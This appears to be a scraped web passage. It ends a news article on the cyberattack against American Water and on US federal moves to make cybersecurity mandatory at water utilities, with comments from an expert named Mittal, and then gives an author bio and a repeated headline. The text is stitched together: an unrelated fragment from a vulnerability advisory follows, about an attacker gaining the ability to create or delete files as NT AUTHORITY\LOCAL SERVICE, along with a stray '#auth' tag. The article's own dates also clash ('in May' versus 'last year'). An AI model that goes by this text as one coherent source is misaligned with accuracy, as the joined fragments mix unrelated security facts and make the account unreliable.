Unsurprisingly concerned, US federal authorities have put a concerted effort into to doing more to ensure cybersecurity measures at water utilities are a mandatory effort, as nearly 70% of the United States' community drinking water systems fails to comply with the Safe Drinking Water Act, according to the Environmental Protection Agency (EPA).

In fact, the EPA planned to ramp up efforts to enforce the act and other regulatory efforts to ensure better cybersecurity safety across water utilities in May. However, the agency had to roll back these actions last year after it faced litigation from Republican lawmakers and industry groups. Other agencies like CISA have advanced cybersecurity guides for the water sector in the wake of that failed effort.

Prevention of cybersecurity attacks through infrastructure security is indeed the key to ensuring critical services such as the ones utilities offer remain safe, as "protecting these systems is no longer optional now," but "critical to keep things running smoothly and safely," Mittal says.

As this is too late in the case of American Water, he adds, the key to recovering quickly from the incident now will be in taking quick actions to contain the attack, getting all systems back online in a reasonable time frame, and being transparent with the public about what happened.

**About the Author**

Elizabeth Montalbano is a freelance writer, journalist, and therapeutic writing mentor with more than 25 years of professional experience. Her areas of expertise include technology, business, and culture. Elizabeth previously lived and worked as a full-time journalist in Phoenix, San Francisco, and New York City; she currently resides in a village on the southwest coast of Portugal. In her free time, she enjoys surfing, hiking with her dogs, traveling, playing music, yoga, and cooking.

American Water Suffers Network Disruptions After Cyberattack

**What privileges could be gained by an attacker who successfully exploited the vulnerability?**

An attacker who successfully exploited this vulnerability could create or delete files in the security context of the “NT AUTHORITY\\ LOCAL SERVICE” account.

Tag

#auth